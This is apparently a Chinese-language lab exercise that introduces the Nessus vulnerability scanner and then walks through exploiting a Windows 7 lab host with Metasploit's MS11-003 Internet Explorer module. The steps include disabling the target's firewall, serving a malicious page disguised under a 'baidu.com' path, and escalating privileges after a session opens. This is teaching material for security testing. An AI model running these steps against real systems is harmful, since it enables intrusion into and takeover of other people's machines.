Nessus基本介绍
Nessus是一个功能强大而又易于使用的网络和主机漏洞评估工具,分为免费的家庭版和付费的企业版。Nessus6.0以后采取Browser/Server模式,Server端负责进行安全检查、具体的扫描任务,客户端用来配置管理服务器端。服务端采用plug-in的体系,允许用户加入执行特定功能的插件,这插件可以进行更快速和更复杂的安全检查。Nessus自带大量安全检查插件能够满足一般用户的安全评估任务需要,如果有特殊需要也可以将自己开发的安全检查插件集成到Nessus中。
和其他安全扫描工具相比,Nessus主要优势在于免费、扩展性强,容易使用以及能够对目标系统进行全面的漏洞扫描。
默认状态下, Nessus安装成功后会开机自启动,用户使用安装时配置的账号登陆其管理界面,添加扫描任务,根据相关需要对扫描任务的相关属性进行详细的配置。等扫描完成以后,会生成一份详细的报告,报告里会将扫描结果按照危险系数高低分成高危漏洞、中危漏洞、低危漏洞三类,我们一般重点关注高危漏洞,中危漏洞利用条件会比较苛刻,低危漏洞基本没有利用的可能。查看高危漏洞详情,根据漏洞简介信息使用google搜索是否存在已知的Exp和攻击方法可以提高安全测试效率。
实验目的
通过该实验熟悉Nessus漏洞扫描工具的安装和主机漏洞扫描的方法,学会利用Nessus扫描结果筛选合适的Metasploit攻击模块进行安全测试、攻击。
步骤1
初步了解实验环境及Nessus安装、
为了更好的演示攻击win7系统实例需要关闭win7系统的防火墙,win+R输入cmd,运行“netsh firewall set opmode mode=disable”命令
步骤二
利用Nessus扫描目标主机
执行命令 /etc/init.d/nessusd start 启动Nessus服务
登陆Nessus
新建一个扫描,配置扫描信息,主要设置扫描名称、描述和扫描目标三个信息即可,其他配置选择默认,配置完成点击Save。选择对整个10.1.1.0/24网段进行扫描
Nessus扫描网段结果,重点关注10.1.1.129主机,即win7靶机,Nessus扫描出该主机存在四个最高危漏洞、2个高危漏洞及其它漏洞问题。
步骤三
利用MS11_003 IE漏洞攻击win7主机
1.在kali中执行“msfconsole”,启动metasploit
2.运行命令:“use exploit/windows/browser/ms11_003_ie_css_import”选择漏洞利用EXP
设置生成的恶意网页的URI为baidu.com
运行命令:set URIPATH baidu.com. 为防止服务器端口冲突,设置服务器端口为8060,避开常用端口8080 设置攻击负载
设置LHOST以绑定本地IP
行命令“exploit”开始进行攻击
在 Win7靶机打开IE,访问http://10.1.1.128:8060/baidu.com,模拟受害者误点击网页
验证攻击是否成功。列出当前成功建立的回话,任意进入一个回话,查看攻击者的身份。可以尝试使用getsystem进行进一步的提权,如果提权失败则可以采取上传提权exe程序进行提权的方案获得最高权限。
sessions 列出所有会话
sessions -i 1 进入1号会话
getuid 查看当前用户